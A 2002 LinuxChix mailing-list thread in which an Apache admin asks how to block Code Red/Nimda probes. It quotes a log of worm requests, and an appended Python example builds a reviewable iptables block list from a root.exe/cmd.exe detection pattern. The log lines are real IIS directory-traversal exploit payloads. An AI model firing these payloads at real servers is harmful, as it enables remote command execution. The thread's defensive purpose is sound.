[Techtalk] outlook virii
James
james at james-web.net
Sat Apr 13 09:53:56 EST 2002
There was, during the first CR outbreak. I think it would be way too
big for anyone to manage now :/
- James
> -----Original Message-----
> From: techtalk-admin at linuxchix.org [mailto:techtalk-admin at linuxchix.org]
> On Behalf Of jennyw
> Sent: Saturday, April 13, 2002 1:44 AM
> To: Techtalk at linuxchix.org
> Subject: Re: [Techtalk] outlook virii
>
> I wonder if there's a Web site that lists the IPs of all infected
> machines. That might be interesting ...
>
> Jen
>
> On Fri, Apr 12, 2002 at 10:43:26PM -0400, James wrote:
> > I remember someone that made a Perl script which added offending IPs to
> > an ipchains/iptables block list.
> >
> > However, automated is BAD. If this procedure caught on, virii writers
> > might spoof IPs as a snub to those who do this. Imagine if suddenly
> > you've blackholed localhost or your gateway or your DNS servers or
> > everything else in your Class C.
> >
> > Basically, I just laugh at Nimda/CR trying to compromise my Apache
> > server and weep because of all the people who are still
> > vulnerable/infected.
> >
> > - James
> >
> > > -----Original Message-----
> > > From: techtalk-admin at linuxchix.org [mailto:techtalk-admin at linuxchix.org]
> > > On Behalf Of Davis, Jennifer
> > > Sent: Friday, April 12, 2002 5:20 PM
> > > To: 'Techtalk at linuxchix.org'
> > > Subject: [Techtalk] outlook virii
> > >
> > > Hi:
> > >
> > > I was wondering if it was possible to send some sort of message back
> > > to people (like maybe a popup message) when they hit my webserver that
> > > surfing with viruses on their system is just not cool. See an excerpt
> > > from my log below. I estimate that 95% of the hits to my web server are
> > > these exploit attempts. Barring that, is there a way to block an IP that
> > > we'll say is looking for root.exe? The webserver is a standard Apache
> > > 1.3? that came with Slackware 8.0.
> > >
> > > Thanks again
> > > Jenn
> > >
> > > Jennifer Davis
> > > Constitutional & Administrative Law - Droit administratif & constitutionnel
> > > Department of Justice Canada - Ministère de la Justice du Canada
> > > *(613) 957-4963 - fx (613) 941-1937
> > > *jdavis at justice.gc.ca
> > >
> > > 64.168.22.13 - - [10/Apr/2002:17:10:57 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 1601
> > > 64.168.22.13 - - [10/Apr/2002:17:10:58 -0400] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 1601
> > > 64.168.22.13 - - [10/Apr/2002:17:10:58 -0400] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1601
> > > 64.168.22.13 - - [10/Apr/2002:17:10:59 -0400] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1601
> > > 64.168.22.13 - - [10/Apr/2002:17:11:00 -0400] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1601
> > > 64.168.22.13 - - [10/Apr/2002:17:11:00 -0400] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1601
> > > 64.168.22.13 - - [10/Apr/2002:17:11:01 -0400] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1601
> > > 64.168.22.13 - - [10/Apr/2002:17:11:01 -0400] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP$
> > > 64.168.22.13 - - [10/Apr/2002:17:11:02 -0400] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1601
> > > 64.168.22.13 - - [10/Apr/2002:17:11:03 -0400] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1601
> > > 64.168.22.13 - - [10/Apr/2002:17:11:04 -0400] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1601
> > > 64.168.22.13 - - [10/Apr/2002:17:11:04 -0400] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1601
> > > 64.168.22.13 - - [10/Apr/2002:17:11:05 -0400] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 285
> > > 64.168.22.13 - - [10/Apr/2002:17:11:05 -0400] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 285
> > > 64.168.22.13 - - [10/Apr/2002:17:11:06 -0400] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1601
> > > 64.168.22.13 - - [10/Apr/2002:17:11:06 -0400] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1601
> > >
> > >
> > >
> > >
> > > _______________________________________________
> > > Techtalk mailing list
> > > Techtalk at linuxchix.org
> > > http://mailman.linuxchix.org/mailman/listinfo/techtalk
> >
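An added example, not part of the original thread and not the Perl script it mentions: a log-driven block list that keeps the safeguard the quoted message asks for, so loopback, the gateway and the DNS servers can never be blackholed. The function names, the three-hit threshold and every address are assumptions; the sample log lines are constructed, using the request paths from the excerpt above.

```python
import ipaddress
import re
from collections import Counter

# Request paths probed in the thread's log excerpt (root.exe, cmd.exe).
PROBE = re.compile(r"/(root|cmd)\.exe\?", re.IGNORECASE)
# Apache common log format: client address, then the quoted request line.
LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|HEAD|POST) (\S+)[^"]*"')

def block_candidates(log_lines, never_block, min_hits=3):
    """Return (to_block, skipped): sources with at least min_hits probe
    requests, split by whether they sit inside a protected network."""
    protected = [ipaddress.ip_network(n) for n in never_block]
    hits = Counter()
    for line in log_lines:
        m = LINE.match(line)
        if not m or not PROBE.search(m.group(2)):
            continue
        try:
            hits[ipaddress.ip_address(m.group(1))] += 1
        except ValueError:
            continue  # hostname or junk in the client field: never act on it
    to_block, skipped = [], []
    for addr, n in sorted(hits.items(), key=lambda kv: str(kv[0])):
        if n < min_hits:
            continue
        is_protected = any(addr in net for net in protected)
        (skipped if is_protected else to_block).append(str(addr))
    return to_block, skipped

def iptables_rules(addresses):
    """Render DROP rules as text for a human to review; nothing is executed."""
    return [f"iptables -A INPUT -s {a} -j DROP" for a in addresses]

def sample_line(ip, path):  # builds one constructed log line
    return f'{ip} - - [10/Apr/2002:17:10:57 -0400] "GET {path} HTTP/1.0" 404 1601'

PATHS = ["/scripts/root.exe?/c+dir", "/MSADC/root.exe?/c+dir",
         "/c/winnt/system32/cmd.exe?/c+dir"]
# Constructed sample: one outside source, plus loopback and an assumed gateway.
SAMPLE_LOG = [sample_line(ip, p) for ip in ("198.51.100.7", "127.0.0.1", "192.0.2.1")
              for p in PATHS]
SAMPLE_LOG += [sample_line("203.0.113.9", PATHS[0]),
               sample_line("198.51.100.20", "/index.html")]
NEVER_BLOCK = ["127.0.0.0/8", "192.0.2.1/32", "192.0.2.53/32"]  # loopback, gateway, DNS

if __name__ == "__main__":
    to_block, skipped = block_candidates(SAMPLE_LOG, NEVER_BLOCK)
    print("\n".join(iptables_rules(to_block)))
    print("protected, not blocked:", skipped)
```

Passing an empty `never_block` list reproduces the failure mode described in the thread: loopback and the gateway land on the block list alongside the real source.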